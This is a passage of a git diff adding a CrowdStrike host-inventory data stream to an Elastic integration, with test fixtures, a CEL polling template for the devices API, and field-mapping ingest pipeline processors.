pplied_date":"2023-11-07T04:52:59.515775409Z","assigned_date":"2023-11-07T04:51:18.94671252Z","policy_id":"7e3078b60976486cac5dc998808d9135","policy_type":"globalconfig","settings_hash":"f01def74"},"prevention":{"applied":true,"applied_date":"2023-06-08T10:04:47.643357971Z","assigned_date":"2023-06-08T10:03:49.505180252Z","policy_id":"1024fac1b279424fa7300b8ac2d56be5","policy_type":"prevention","rule_groups":[],"settings_hash":"f7a54ca1"},"remote_response":{"applied":true,"applied_date":"2023-06-08T10:04:47.01735027Z","assigned_date":"2023-06-08T10:03:49.505163572Z","policy_id":"dabb4def99034f11b9b3d52271584c9f","policy_type":"remote-response","settings_hash":"8a548e5e"},"sensor_update":{"applied":true,"applied_date":"2023-11-07T04:52:59.659583066Z","assigned_date":"2023-11-07T04:47:43.342175341Z","policy_id":"64bfa2bbcd4e46da92a66b107933da11","policy_type":"sensor-update","settings_hash":"tagged|18;101","uninstall_protection":"ENABLED"}},"external_ip":"81.2.69.192","first_seen":"2023-06-08T10:00:19Z","group_hash":"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77","groups":["182388a8dbea4c44b5e019cfd32c2695"],"hostname":"CLM101-131.local","kernel_version":"22.6.0","last_seen":"2023-11-07T10:25:24Z","local_ip":"81.2.69.142","mac_address":"14-7d-da-ad-ac-71","machine_domain":"SYS","major_version":"22","meta":{"version":"6002","version_string":"7:43570272778"},"minor_version":"6","modified_timestamp":"2023-11-07T10:26:53Z","os_build":"22G120","os_version":"Ventura(13)","platform_id":"1","platform_name":"Mac","policies":[{"applied":true,"applied_date":"2023-06-08T10:04:47.643357971Z","assigned_date":"2023-06-08T10:03:49.505180252Z","policy_id":"1024fac1b279424fa7300b8ac2d56be5","policy_type":"prevention","rule_groups":[],"settings_hash":"f7a54ca1"}],"product_type_desc":"Workstation","provision_status":"Provisioned","reduced_functionality_mode":"no","serial_number":"FVFDH73HMNHX","site_name":"Default-First-Site-Name","status":"normal","system_manufacturer":"ABCInc.","system_product_name":"Air,1","tags":["tags"]} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log-expected.json b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log-expected.json new file mode 100644 index 00000000000..a6056a521f5 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log-expected.json @@ -0,0 +1,207 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-07T10:26:53.000Z", + "crowdstrike": { + "host": { + "agent": { + "load_flags": "0", + "local_time": "2023-11-07T04:51:16.678Z", + "version": "7.05.17603.0" + }, + "bios": { + "manufacturer": "ABCInc.", + "version": "2020.0.1.0.0(iBridge:22.11.000.0.0,0)" + }, + "chassis_type": { + "desc": "Laptop", + "value": "9" + }, + "cid": "92012896127c4948236ba7601b886b0", + "config_id": { + "base": "6594763", + "build": "1703", + "platform": "4" + }, + "connection_ip": "81.2.69.192", + "cpu_signature": "460517", + "device_policies": { + "device_control": { + "applied": true, + "applied_date": "2023-06-20T08:45:26.341Z", + "assigned_date": "2023-06-20T08:43:47.736Z", + "policy_id": "2f88daf0177f467dae69262a5ce71775", + "policy_type": "device-control" + }, + "firewall": { + "applied": true, + "applied_date": "2023-09-11T10:33:44.174Z", + "assigned_date": "2023-09-11T10:32:47.853Z", + "policy": { + "id": "1ee301f7e3e24e96ad6a23c73aaac1e3", + "type": "firewall" + }, + "rule_set_id": "1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.515Z", + "assigned_date": "2023-11-07T04:51:18.946Z", + "policy": { + "id": "7e3078b60976486cac5dc998808d9135", + "type": "globalconfig" + }, + "settings_hash": "f01def74" + }, + "prevention": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + }, + "remote_response": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.017Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "dabb4def99034f11b9b3d52271584c9f", + "type": "remote-response" + }, + "settings_hash": "8a548e5e" + }, + "sensor_update": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.659Z", + "assigned_date": "2023-11-07T04:47:43.342Z", + "policy": { + "id": "64bfa2bbcd4e46da92a66b107933da11", + "type": "sensor-update" + }, + "settings_hash": "tagged|18;101", + "uninstall_protection": "ENABLED" + } + }, + "external_ip": "81.2.69.192", + "first_seen": "2023-06-08T10:00:19.000Z", + "group_hash": "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups": [ + "182388a8dbea4c44b5e019cfd32c2695" + ], + "hostname": "CLM101-131.local", + "id": "3114433dbce478ca48d9a828b9b34be", + "kernel_version": "22.6.0", + "last_seen": "2023-11-07T10:25:24.000Z", + "local_ip": "81.2.69.142", + "mac_address": "14-7D-DA-AD-AC-71", + "machine_domain": "SYS", + "major_version": "22", + "meta": { + "version": "6002", + "version_string": "7:43570272778" + }, + "minor_version": "6", + "modified_timestamp": "2023-11-07T10:26:53.000Z", + "os": { + "build": "22G120", + "version": "Ventura(13)" + }, + "platform": { + "id": "1", + "name": "Mac" + }, + "policies": [ + { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + } + ], + "product_type_desc": "Workstation", + "provision_status": "Provisioned", + "reduced_functionality_mode": "no", + "serial_number": "FVFDH73HMNHX", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system": { + "manufacturer": "ABCInc.", + "product_name": "Air,1" + }, + "tags": [ + "tags" + ] + } + }, + "device": { + "id": "3114433dbce478ca48d9a828b9b34be" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "host" + ], + "kind": "event", + "original": "{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-11-07T04:51:16.678Z\",\"agent_version\":\"7.05.17603.0\",\"bios_manufacturer\":\"ABCInc.\",\"bios_version\":\"2020.0.1.0.0(iBridge:22.11.000.0.0,0)\",\"chassis_type\":\"9\",\"chassis_type_desc\":\"Laptop\",\"cid\":\"92012896127c4948236ba7601b886b0\",\"config_id_base\":\"6594763\",\"config_id_build\":\"1703\",\"config_id_platform\":\"4\",\"connection_ip\":\"81.2.69.192\",\"cpu_signature\":\"460517\",\"device_id\":\"3114433dbce478ca48d9a828b9b34be\",\"device_policies\":{\"device_control\":{\"applied\":true,\"applied_date\":\"2023-06-20T08:45:26.341093915Z\",\"assigned_date\":\"2023-06-20T08:43:47.736146738Z\",\"policy_id\":\"2f88daf0177f467dae69262a5ce71775\",\"policy_type\":\"device-control\"},\"firewall\":{\"applied\":true,\"applied_date\":\"2023-09-11T10:33:44.174488832Z\",\"assigned_date\":\"2023-09-11T10:32:47.853976945Z\",\"policy_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\",\"policy_type\":\"firewall\",\"rule_set_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\"},\"global_config\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.515775409Z\",\"assigned_date\":\"2023-11-07T04:51:18.94671252Z\",\"policy_id\":\"7e3078b60976486cac5dc998808d9135\",\"policy_type\":\"globalconfig\",\"settings_hash\":\"f01def74\"},\"prevention\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"},\"remote_response\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.01735027Z\",\"assigned_date\":\"2023-06-08T10:03:49.505163572Z\",\"policy_id\":\"dabb4def99034f11b9b3d52271584c9f\",\"policy_type\":\"remote-response\",\"settings_hash\":\"8a548e5e\"},\"sensor_update\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.659583066Z\",\"assigned_date\":\"2023-11-07T04:47:43.342175341Z\",\"policy_id\":\"64bfa2bbcd4e46da92a66b107933da11\",\"policy_type\":\"sensor-update\",\"settings_hash\":\"tagged|18;101\",\"uninstall_protection\":\"ENABLED\"}},\"external_ip\":\"81.2.69.192\",\"first_seen\":\"2023-06-08T10:00:19Z\",\"group_hash\":\"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77\",\"groups\":[\"182388a8dbea4c44b5e019cfd32c2695\"],\"hostname\":\"CLM101-131.local\",\"kernel_version\":\"22.6.0\",\"last_seen\":\"2023-11-07T10:25:24Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"14-7d-da-ad-ac-71\",\"machine_domain\":\"SYS\",\"major_version\":\"22\",\"meta\":{\"version\":\"6002\",\"version_string\":\"7:43570272778\"},\"minor_version\":\"6\",\"modified_timestamp\":\"2023-11-07T10:26:53Z\",\"os_build\":\"22G120\",\"os_version\":\"Ventura(13)\",\"platform_id\":\"1\",\"platform_name\":\"Mac\",\"policies\":[{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"}],\"product_type_desc\":\"Workstation\",\"provision_status\":\"Provisioned\",\"reduced_functionality_mode\":\"no\",\"serial_number\":\"FVFDH73HMNHX\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"ABCInc.\",\"system_product_name\":\"Air,1\",\"tags\":[\"tags\"]}", + "type": [ + "info" + ] + }, + "host": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "hostname": "CLM101-131.local", + "ip": [ + "81.2.69.192" + ], + "mac": [ + "14-7D-DA-AD-AC-71" + ], + "os": { + "full": "Ventura(13)", + "platform": "Mac" + } + }, + "related": { + "hash": [ + "f01def74", + "f7a54ca1", + "8a548e5e", + "tagged|18;101", + "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77" + ], + "hosts": [ + "CLM101-131.local", + "SYS" + ], + "ip": [ + "81.2.69.192", + "81.2.69.142" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + } + ] +} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/host/_dev/test/system/test-common-config.yml b/packages/crowdstrike/data_stream/host/_dev/test/system/test-common-config.yml new file mode 100644 index 00000000000..ce31a5541cf --- /dev/null +++ b/packages/crowdstrike/data_stream/host/_dev/test/system/test-common-config.yml @@ -0,0 +1,15 @@ +input: cel +service: crowdstrike-host +vars: + url: http://{{Hostname}}:{{Port}} + client_id: xxxx + client_secret: xxxx + token_url: http://{{Hostname}}:{{Port}}/oauth2/token +data_stream: + vars: + interval: 10s + batch_size: 1 + preserve_original_event: true + preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/crowdstrike/data_stream/host/agent/stream/cel.yml.hbs b/packages/crowdstrike/data_stream/host/agent/stream/cel.yml.hbs new file mode 100644 index 00000000000..c9f18bb66ce --- /dev/null +++ b/packages/crowdstrike/data_stream/host/agent/stream/cel.yml.hbs @@ -0,0 +1,103 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +request.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +auth.oauth2: + client.id: {{client_id}} + client.secret: {{client_secret}} + token_url: {{token_url}} +state: + initial_interval: {{initial_interval}} + want_more: false + offset: 0 + batch_size: {{batch_size}} +redact: + fields: ~ +program: | + ( + state.with( + ( + !state.want_more ? + request("GET", state.url + "/devices/queries/devices/v1?sort=modified_timestamp.asc&offset=0&limit=" + string(state.batch_size) + '&filter=modified_timestamp:>"' + ( + has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + state.cursor.last_timestamp + '"' + : + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + '"' + )) + : + request("GET", state.url + "/devices/queries/devices/v1?sort=modified_timestamp.asc&offset=" + string(state.offset) + "&limit=" + string(state.batch_size) + '&filter=modified_timestamp:>"' + ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + '"' + : + '"' + )) + ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "resources": has(body.resources) && body.resources.size() > 0 ? body.resources : "", + "want_more": ((int(state.offset) + body.resources.size()) < body.meta.pagination.total), + "offset": ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? + int(state.offset) + int(body.resources.size()) + : + 0, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + })) + ).as(state, state.with( + !has(state.resources) || state.resources == "" ? {"events": []} : + post_request( + state.url + "/devices/entities/devices/v2", + "application/json", + {"ids": state.resources }.encode_json() + ).do_request().as(resp, bytes(resp.Body).decode_json().as(inner_body, { + "events": inner_body.resources.map(e, { + "message": e.encode_json(), + }), + "cursor": { + "last_timestamp": ( + has(inner_body.resources) && inner_body.resources.size() > 0 ? + inner_body.resources.map(e, e.modified_timestamp).max() + : has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ), + "first_timestamp": ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + ( state.want_more ? state.cursor.first_timestamp : state.cursor.last_timestamp ) + : + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + ), + }, + })) + ) + ) + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/crowdstrike/data_stream/host/elasticsearch/ingest_pipeline/default.yml b/packages/crowdstrike/data_stream/host/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..37c0a4ffe8c --- /dev/null +++ b/packages/crowdstrike/data_stream/host/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,816 @@ +--- +description: Pipeline for processing Host logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: 8.11.0 + - set: + field: event.kind + tag: set_event_kind + value: event + - append: + field: event.category + tag: append_host_into_event_category + value: host + allow_duplicates: false + - append: + field: event.type + tag: append_info_into_event_type + value: info + allow_duplicates: false + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + tag: json_event_original + target_field: json + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.agent_load_flags + tag: rename_agent_load_flags + target_field: crowdstrike.host.agent.load_flags + ignore_missing: true + - date: + field: json.agent_local_time + tag: date_agent_local_time + target_field: crowdstrike.host.agent.local_time + formats: + - ISO8601 + if: ctx.json?.agent_local_time != null && ctx.json.agent_local_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.agent_version + tag: rename_agent_version + target_field: crowdstrike.host.agent.version + ignore_missing: true + - rename: + field: json.bios_manufacturer + tag: rename_bios_manufacturer + target_field: crowdstrike.host.bios.manufacturer + ignore_missing: true + - rename: + field: json.bios_version + tag: rename_bios_version + target_field: crowdstrike.host.bios.version + ignore_missing: true + - rename: + field: json.chassis_type_desc + tag: rename_chassis_type_desc + target_field: crowdstrike.host.chassis_type.desc + ignore_missing: true + - rename: + field: json.chassis_type + tag: rename_chassis_type + target_field: crowdstrike.host.chassis_type.value + ignore_missing: true + - rename: + field: json.cid + tag: rename_cid + target_field: crowdstrike.host.cid + ignore_missing: true + - rename: + field: json.config_id_base + tag: rename_config_id_base + target_field: crowdstrike.host.config_id.base + ignore_missing: true + - rename: + field: json.config_id_build + tag: rename_config_id_build + target_field: crowdstrike.host.config_id.build + ignore_missing: true + - rename: + field: json.config_id_platform + tag: rename_config_id_platform + target_field: crowdstrike.host.config_id.platform + ignore_missing: true + - convert: + field: json.connection_ip + tag: convert_connection_ip_to_ip + target_field: crowdstrike.host.connection_ip + type: ip + ignore_missing: true + if: ctx.json?.connection_ip != null && ctx.json.connection_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_connection_ip_into_related_ip + value: '{{{crowdstrike.host.connection_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.connection_ip != null + - rename: + field: json.cpu_signature + tag: rename_cpu_signature + target_field: crowdstrike.host.cpu_signature + ignore_missing: true + - convert: + field: json.device_policies.device_control.applied + tag: convert_device_policies_device_control_applied_to_boolean + target_field: crowdstrike.host.device_policies.device_control.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.device_control.applied_date + tag: date_device_policies_device_control_applied_date + target_field: crowdstrike.host.device_policies.device_control.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.device_control?.applied_date != null && ctx.json.device_policies.device_control.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.device_control.assigned_date + tag: date_device_policies_device_control_assigned_date + target_field: crowdstrike.host.device_policies.device_control.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.device_control?.assigned_date != null && ctx.json.device_policies.device_control.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.device_control.policy_id + tag: rename_device_policies_device_control_policy_id + target_field: crowdstrike.host.device_policies.device_control.policy_id + ignore_missing: true + - rename: + field: json.device_policies.device_control.policy_type + tag: rename_device_policies_device_control_policy_type + target_field: crowdstrike.host.device_policies.device_control.policy_type + ignore_missing: true + - convert: + field: json.device_policies.firewall.applied + tag: convert_device_policies_firewall_applied_to_boolean + target_field: crowdstrike.host.device_policies.firewall.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.firewall.applied_date + tag: date_device_policies_firewall_applied_date + target_field: crowdstrike.host.device_policies.firewall.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.firewall?.applied_date != null && ctx.json.device_policies.firewall.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.firewall.assigned_date + tag: date_device_policies_firewall_assigned_date + target_field: crowdstrike.host.device_policies.firewall.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.firewall?.assigned_date != null && ctx.json.device_policies.firewall.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.firewall.policy_id + tag: rename_device_policies_firewall_policy_id + target_field: crowdstrike.host.device_policies.firewall.policy.id + ignore_missing: true + - rename: + field: json.device_policies.firewall.policy_type + tag: rename_device_policies_firewall_policy_type + target_field: crowdstrike.host.device_policies.firewall.policy.type + ignore_missing: true + - rename: + field: json.device_policies.firewall.rule_set_id + tag: rename_device_policies_firewall_rule_set_id + target_field: crowdstrike.host.device_policies.firewall.rule_set_id + ignore_missing: true + - convert: + field: json.device_policies.global_config.applied + tag: convert_device_policies_global_config_applied_to_boolean + target_field: crowdstrike.host.device_policies.global_config.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.global_config.applied_date + tag: date_device_policies_global_config_applied_date + target_field: crowdstrike.host.device_policies.global_config.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.global_config?.applied_date != null && ctx.json.device_policies.global_config.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.global_config.assigned_date + tag: date_device_policies_global_config_assigned_date + target_field: crowdstrike.host.device_policies.global_config.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.global_config?.assigned_date != null && ctx.json.device_policies.global_config.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.global_config.policy_id + tag: rename_device_policies_global_config_policy_id + target_field: crowdstrike.host.device_policies.global_config.policy.id + ignore_missing: true + - rename: + field: json.device_policies.global_config.policy_type + tag: rename_device_policies_global_config_policy_type + target_field: crowdstrike.host.device_policies.global_config.policy.type + ignore_missing: true + - rename: + field: json.device_policies.global_config.settings_hash + tag: rename_device_policies_global_config_settings_hash + target_field: crowdstrike.host.device_policies.global_config.settings_hash + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.host.device_policies.global_config.settings_hash}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.device_policies?.global_config?.settings_hash != null + - convert: + field: json.device_policies.prevention.applied + tag: convert_device_policies_prevention_applied_to_boolean + target_field: crowdstrike.host.device_policies.prevention.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.prevention.applied_date + tag: date_device_policies_prevention_applied_date + target_field: crowdstrike.host.device_policies.prevention.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.prevention?.applied_date != null && ctx.json.device_policies.prevention.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.prevention.assigned_date + tag: date_device_policies_prevention_assigned_date + target_field: crowdstrike.host.device_policies.prevention.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.prevention?.assigned_date != null && ctx.json.device_policies.prevention.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.prevention.policy_id + tag: rename_device_policies_prevention_policy_id + target_field: crowdstrike.host.device_policies.prevention.policy.id + ignore_missing: true + - rename: + field: json.device_policies.prevention.policy_type + tag: rename_device_policies_prevention_policy_type + target_field: crowdstrike.host.device_policies.prevention.policy.type + ignore_missing: true + - rename: + field: json.device_policies.prevention.rule_groups + tag: rename_device_policies_prevention_rule_groups + target_field: crowdstrike.host.device_policies.prevention.rule_groups + ignore_missing: true + - rename: + field: json.device_policies.prevention.settings_hash + tag: rename_device_policies_prevention_settings_hash + target_field: crowdstrike.host.device_policies.prevention.settings_hash + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.host.device_policies.prevention.settings_hash}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.device_policies?.prevention?.settings_hash != null + - convert: + field: json.device_policies.remote_response.applied + tag: convert_device_policies_remote_response_applied_to_boolean + target_field: crowdstrike.host.device_policies.remote_response.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.remote_response.applied_date + tag: date_device_policies_remote_response_applied_date + target_field: crowdstrike.host.device_policies.remote_response.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.remote_response?.applied_date != null && ctx.json.device_policies.remote_response.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.remote_response.assigned_date + tag: date_device_policies_remote_response_assigned_date + target_field: crowdstrike.host.device_policies.remote_response.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.remote_response?.assigned_date != null && ctx.json.device_policies.remote_response.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.remote_response.policy_id + tag: rename_device_policies_remote_response_policy_id + target_field: crowdstrike.host.device_policies.remote_response.policy.id + ignore_missing: true + - rename: + field: json.device_policies.remote_response.policy_type + tag: rename_device_policies_remote_response_policy_type + target_field: crowdstrike.host.device_policies.remote_response.policy.type + ignore_missing: true + - rename: + field: json.device_policies.remote_response.settings_hash + tag: rename_device_policies_remote_response_settings_hash + target_field: crowdstrike.host.device_policies.remote_response.settings_hash + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.host.device_policies.remote_response.settings_hash}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.device_policies?.remote_response?.settings_hash != null + - convert: + field: json.device_policies.sensor_update.applied + tag: convert_device_policies_sensor_update_applied_to_boolean + target_field: crowdstrike.host.device_policies.sensor_update.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.sensor_update.applied_date + tag: date_device_policies_sensor_update_applied_date + target_field: crowdstrike.host.device_policies.sensor_update.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.sensor_update?.applied_date != null && ctx.json.device_policies.sensor_update.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.sensor_update.assigned_date + tag: date_device_policies_sensor_update_assigned_date + target_field: crowdstrike.host.device_policies.sensor_update.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.sensor_update?.assigned_date != null && ctx.json.device_policies.sensor_update.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.sensor_update.policy_id + tag: rename_device_policies_sensor_update_policy_id + target_field: crowdstrike.host.device_policies.sensor_update.policy.id + ignore_missing: true + - rename: + field: json.device_policies.sensor_update.policy_type + tag: rename_device_policies_sensor_update_policy_type + target_field: crowdstrike.host.device_policies.sensor_update.policy.type + ignore_missing: true + - rename: + field: json.device_policies.sensor_update.settings_hash + tag: rename_device_policies_sensor_update_settings_hash + target_field: 